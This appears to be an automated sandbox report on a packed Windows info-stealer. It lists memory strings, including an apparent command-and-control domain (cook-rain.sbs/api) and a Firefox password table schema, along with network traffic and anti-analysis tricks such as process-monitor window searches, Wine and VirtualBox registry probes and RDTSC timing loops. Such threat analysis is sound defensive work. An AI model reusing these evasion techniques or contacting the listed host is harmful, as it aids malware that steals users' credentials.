Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000002.00000003.1478339631.0000000000803000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569493664.0000000005476000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1450031646.0000000000804000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1490554719.0000000000803000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1532395344.0000000000803000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1449635687.0000000000802000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1449515959.00000000007FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/
Source: file.exe, 00000002.00000003.1421786251.000000000546F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1422914925.0000000005473000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1443791649.0000000005470000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1449469367.0000000005470000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1421973811.0000000005473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/;
Source: file.exe, 00000002.00000002.1635250870.000000000547A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569277851.0000000005474000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569493664.0000000005476000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1532217944.0000000005480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/D(
Source: file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/api
Source: file.exe, 00000002.00000003.1569277851.0000000005474000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569493664.0000000005476000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1532217944.0000000005480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/api=
Source: file.exe, 00000002.00000003.1443791649.0000000005470000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1449469367.0000000005470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/apiC
Source: file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/apiecked
Source: file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/apiq
Source: file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/apix
Source: file.exe, 00000002.00000003.1484843360.0000000005461000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1443791649.0000000005470000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1449469367.0000000005470000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/on
Source: file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cook-rain.sbs/v1=
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000002.00000003.1423704032.0000000005587000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000002.00000003.1423704032.0000000005587000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000002.00000003.1383920686.00000000054AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.00000000054A9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384201538.00000000054A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000002.00000003.1423704032.0000000005587000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: file.exe, 00000002.00000003.1423704032.0000000005587000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: file.exe, 00000002.00000003.1423704032.0000000005587000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: file.exe, 00000002.00000003.1423704032.0000000005587000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000002.00000003.1423704032.0000000005587000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49802 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49832 version: TLS 1.2

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9973893873762376
Source: file.exe Static PE information: Section: cizbpulm ZLIB complexity 0.994610956970405
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/3
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\OLUMS4HX.htm Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000002.00000003.1407994974.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1383510400.0000000005496000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1384015238.0000000005478000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: file.exe Static file information: File size 1814016 > 1048576
Source: file.exe Static PE information: Raw size of cizbpulm is bigger than: 0x100000 < 0x191400

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 2.2.file.exe.a70000.0.unpack :EW;.rsrc :W;.idata :W; :EW;cizbpulm:EW;joqsldst:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;cizbpulm:EW;joqsldst:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x1c9902 should be: 0x1be757
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: cizbpulm
Source: file.exe Static PE information: section name: joqsldst
Source: file.exe Static PE information: section name: .taggant
Source: file.exe Static PE information: section name: entropy: 7.972498189955862
Source: file.exe Static PE information: section name: cizbpulm entropy: 7.953165385789899

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACB9C2 second address: ACB9C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3755E second address: C3756C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F626941E956h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3756C second address: C37570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2E395 second address: C2E3A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007F626941E956h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2E3A8 second address: C2E3D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6268DAF3D3h 0x00000008 jmp 00007F6268DAF3D7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2E3D7 second address: C2E3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007F626941E964h 0x0000000d jo 00007F626941E95Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C387D6 second address: C387DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38854 second address: C3885A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3885A second address: C38910 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edx, dword ptr [ebp+122D2812h] 0x00000010 push 00000000h 0x00000012 jmp 00007F6268DAF3D2h 0x00000017 push 7C40A682h 0x0000001c jmp 00007F6268DAF3D0h 0x00000021 xor dword ptr [esp], 7C40A602h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F6268DAF3C8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000019h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 add dh, 00000032h 0x00000045 push 00000003h 0x00000047 mov di, 6FFCh 0x0000004b push 00000000h 0x0000004d push 00000000h 0x0000004f push ebx 0x00000050 call 00007F6268DAF3C8h 0x00000055 pop ebx 0x00000056 mov dword ptr [esp+04h], ebx 0x0000005a add dword ptr [esp+04h], 00000014h 0x00000062 inc ebx 0x00000063 push ebx 0x00000064 ret 0x00000065 pop ebx 0x00000066 ret 0x00000067 sbb di, D48Ah 0x0000006c mov cx, 585Bh 0x00000070 push 00000003h 0x00000072 add esi, dword ptr [ebp+122D28A2h] 0x00000078 push AED281C4h 0x0000007d push eax 0x0000007e push edx 0x0000007f pushad 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38910 second address: C3891B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F626941E956h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38A8D second address: C38A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38A93 second address: C38A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38A9C second address: C38AE3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jnp 00007F6268DAF3C6h 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007F6268DAF3D2h 0x0000001b mov eax, dword ptr [eax] 0x0000001d jmp 00007F6268DAF3D0h 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jns 00007F6268DAF3C6h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38AE3 second address: C38B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 xor si, 6B62h 0x0000000d push 00000003h 0x0000000f and edx, 1DFE1271h 0x00000015 push 00000000h 0x00000017 call 00007F626941E95Ah 0x0000001c mov edx, eax 0x0000001e pop edx 0x0000001f push 00000003h 0x00000021 mov si, ax 0x00000024 call 00007F626941E959h 0x00000029 push edx 0x0000002a pushad 0x0000002b push edx 0x0000002c pop edx 0x0000002d jmp 00007F626941E95Eh 0x00000032 popad 0x00000033 pop edx 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F626941E969h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38B45 second address: C38C0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6268DAF3D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007F6268DAF3D8h 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007F6268DAF3D9h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 jnp 00007F6268DAF3CAh 0x00000027 pop eax 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F6268DAF3C8h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 add edi, dword ptr [ebp+122D2852h] 0x00000048 lea ebx, dword ptr [ebp+12440734h] 0x0000004e mov edx, dword ptr [ebp+122D2926h] 0x00000054 xchg eax, ebx 0x00000055 jmp 00007F6268DAF3D9h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F6268DAF3D5h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38C0D second address: C38C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F626941E956h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38C71 second address: C38C95 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6268DAF3C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6268DAF3D2h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38C95 second address: C38D40 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dx, bx 0x0000000b push 00000000h 0x0000000d or dx, F662h 0x00000012 push 315E4456h 0x00000017 jmp 00007F626941E965h 0x0000001c xor dword ptr [esp], 315E44D6h 0x00000023 mov dword ptr [ebp+122D26CCh], edx 0x00000029 push 00000003h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F626941E958h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 clc 0x00000046 push 00000000h 0x00000048 mov si, 3521h 0x0000004c push 00000003h 0x0000004e cld 0x0000004f call 00007F626941E959h 0x00000054 je 00007F626941E971h 0x0000005a push edx 0x0000005b jmp 00007F626941E969h 0x00000060 pop edx 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jns 00007F626941E96Ah 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38D40 second address: C38D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6268DAF3D8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38D5C second address: C38D7D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jnc 00007F626941E95Eh 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
